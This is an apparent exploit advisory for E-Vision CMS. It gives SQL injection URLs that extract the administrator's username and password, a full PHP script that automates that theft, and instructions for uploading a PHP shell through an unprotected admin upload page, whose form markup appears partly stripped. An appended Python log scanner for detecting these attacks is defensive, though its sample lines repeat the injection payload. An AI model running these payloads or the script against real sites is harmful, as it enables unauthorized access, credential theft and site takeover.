


E-Vision CMS Multiple Remote injections






Hello,

E-Vision CMS Multiple Remote injections (SQL and File upload)

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


Upload any file

admin/x_image.php
This file is used to upload files, and it does not check permissions.

This file can be used to upload any file to the dir /imagebank.
Replace http://localhost/evision_cms/ with the website's directory and choose any file; it will be uploaded.

action="http://localhost/evision_cms/admin/x_image.php" method="POST">

Upload PHP Shell :

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sql Injection
Password:
admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*
User Name:
admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Exploits :-
For PHP shell uploading:-
action="http://localhost/evision_cms/admin/x_image.php" method="POST">

Upload PHP Shell :

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
For Sql injection:-
#!/usr/bin/php -q -d short_open_tag=on
WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/* e-Vision CMS Remote sql injection exploit */
/* by HACKERS PAL */
/* site: http://www.soqor.net */');
if ($argc<2) {
print_r('
/* -- */
/* Usage: php '.$argv[0].' host
/* Example: */
/* php '.$argv[0].' http://localhost/evision
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit="/admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*";
$exploit2="/admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*";

Function get_page($url)
{
    if(function_exists("file_get_contents"))
    {
        $contents = file_get_contents($url);
    }
    else
    {
        $fp=fopen("$url","r");
        while($line=fread($fp,1024))
        {
            $contents=$contents.$line;
        }
    }
    return $contents;
}

function get($var)
{
    if(strlen($var[1])>0)
    {
        Echo trim($var[1]);
    }
}

$page = get_page($url.$exploit);
$page2 = get_page($url.$exploit2);

if(preg_match('/\(.+?)<\/td\>/is',$page))
{
    Echo "\n[+] User Name : ";
    preg_replace_callback('/\(.+?)<\/td\>/is','get',$page);
    Echo "\n[+] Pass Word : ";
    preg_replace_callback('/\(.+?)<\/td\>/is','get',$page2);
    Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
}

Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");
?>

#WwW.SoQoR.NeT
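
A defender-side check for the two issues above, as an added example that is not part of the original advisory: it scans web access-log lines for non-numeric from= values on admin/all_users.php, POSTs to admin/x_image.php, and script files requested from /imagebank. The log lines, the file name photo.php and the treatment of from= as a numeric offset are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format: method, request target, status.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.I)

def classify(line):
    """Return a list of findings for one access-log line (empty if clean)."""
    m = LOG_RE.search(line)
    if not m:
        return []
    method, status = m["method"], m["status"]
    url = urlsplit(m["target"])
    path = url.path.lower()
    findings = []
    # 1. Assumption: `from` is a numeric paging offset, so anything else is suspect.
    if path.endswith("/admin/all_users.php"):
        for value in parse_qs(url.query, keep_blank_values=True).get("from", []):
            if not re.fullmatch(r"\d+", value.strip()):
                findings.append(f"non-numeric from= on all_users.php: {value!r}")
    # 2. x_image.php performs no permission check, so every POST deserves review.
    if method == "POST" and path.endswith("/admin/x_image.php"):
        findings.append(f"upload POST to x_image.php (status {status})")
    # 3. A script served from the upload directory suggests an uploaded file being run.
    if "/imagebank/" in path and SCRIPT_EXT.search(path):
        findings.append(f"script requested from /imagebank: {url.path}")
    return findings

# Constructed sample lines (documentation IP range), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /evision_cms/admin/all_users.php?from=20 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2007:10:02:11 +0000] "GET /evision_cms/admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/* HTTP/1.1" 200 734',
    '192.0.2.44 - - [01/Jan/2007:10:03:40 +0000] "POST /evision_cms/admin/x_image.php HTTP/1.1" 200 310',
    '192.0.2.44 - - [01/Jan/2007:10:03:55 +0000] "GET /evision_cms/imagebank/photo.php HTTP/1.1" 200 88',
    '192.0.2.10 - - [01/Jan/2007:10:05:00 +0000] "GET /evision_cms/imagebank/logo.png HTTP/1.1" 200 20480',
]

def scan(lines):
    """Map line index -> findings for every line that triggered a rule."""
    return {i: f for i, line in enumerate(lines) if (f := classify(line))}

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_LOG).items():
        print(idx, found)
```

A hit on rule 2 followed by a hit on rule 3 from the same client is the sequence to prioritise, since it matches an upload followed by execution of the uploaded file.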

